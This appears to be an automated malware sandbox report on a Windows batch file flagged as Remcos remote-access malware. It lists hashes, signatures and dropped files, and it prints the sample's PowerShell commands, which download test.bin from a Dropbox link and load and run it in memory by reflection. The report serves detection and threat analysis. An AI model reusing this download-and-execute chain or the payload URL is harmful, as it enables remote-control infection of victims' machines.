Analysis

  • max time kernel
    5s
  • max time network
    6s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    24-11-2024 11:17

General

  • Target

    test - Kopie.bat

  • Size

    861B

  • MD5

    f87031970e569760e8d221b726a4c679

  • SHA1

    f2b149768f61329bf32221eb7dd5c99313eee085

  • SHA256

    706ea002a1347263e15b09b2f67c2dc9157c0e2b339352ff4ec4430f52ffd85e

  • SHA512

    3f135dd61288c3def67c0a5b3f3ba46cc9c0820c776335f437f85b81810b574ef759600dbfd6794f78624782e1fbe726e7d810f6609f0e7f206540e5c79a285f

Score
10/10

Malware Config

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Powershell Invoke Web Request.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\test - Kopie.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2400
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/go4g22tj0t5b12ig0ohjb/test.bin?rlkey=5lnzusf90ok1cc4vkzhnif6l4&st=xhzj7uyn&dl=1' -OutFile 'test.bin'"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2960
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "[Reflection.Assembly]::Load(File.ReadAllBytes('test.bin')).EntryPoint.Invoke(null, @())"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3408

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    5f4c933102a824f41e258078e34165a7

    SHA1

    d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

    SHA256

    d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

    SHA512

    a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    da255d6e827f6f566661652c5f08620e

    SHA1

    27a36eb35d67c0ef70bf71d5be1a989641808d65

    SHA256

    a3b85d0066eeb4d7f0ce0c48eacbb922d6b48fd108c611f7cd05835fc0acc956

    SHA512

    7aa629b4929885cf5c42bc1d280083dbd31ccac6425f6757cfce07dbbe4ad33a85fff1d4f8907505dc13f710d4308ee06d1fbc77e365b6b0392c8328b2fc99d0

  • C:\Users\Admin\AppData\Local\Temp\DownloadAndRun\test.bin

    Filesize

    467KB

    MD5

    2cebaf36ff6bc2d6cb65fe5b05219320

    SHA1

    804d909e328929e357fb8b4c08a7c8a851920bed

    SHA256

    333c783deaee7a6685967a731bd8bd8d2009bb032c7e98d22df7973d350fbe7a

    SHA512

    bf6d4e95065f337d2900f5e6d6638661bebaa79ab896ea30718f727f3326fe9cd75264fb0804e53ed4b4ad9a45f304c4b53d05c9e292caa4974d83e696b0aa96

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_us4dwowz.i32.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2960-10-0x00007FFE79A50000-0x00007FFE7A512000-memory.dmp

    Filesize

    10.8MB

  • memory/2960-12-0x00007FFE79A50000-0x00007FFE7A512000-memory.dmp

    Filesize

    10.8MB

  • memory/2960-16-0x00007FFE79A50000-0x00007FFE7A512000-memory.dmp

    Filesize

    10.8MB

  • memory/2960-11-0x00007FFE79A50000-0x00007FFE7A512000-memory.dmp

    Filesize

    10.8MB

  • memory/2960-0-0x00007FFE79A53000-0x00007FFE79A55000-memory.dmp

    Filesize

    8KB

  • memory/2960-1-0x0000024F6EE50000-0x0000024F6EE72000-memory.dmp

    Filesize

    136KB

  • memory/3408-26-0x00007FFE79A50000-0x00007FFE7A512000-memory.dmp

    Filesize

    10.8MB

  • memory/3408-28-0x00007FFE79A50000-0x00007FFE7A512000-memory.dmp

    Filesize

    10.8MB

  • memory/3408-29-0x00007FFE79A50000-0x00007FFE7A512000-memory.dmp

    Filesize

    10.8MB

  • memory/3408-30-0x00007FFE79A50000-0x00007FFE7A512000-memory.dmp

    Filesize

    10.8MB

  • memory/3408-32-0x00007FFE79A50000-0x00007FFE7A512000-memory.dmp

    Filesize

    10.8MB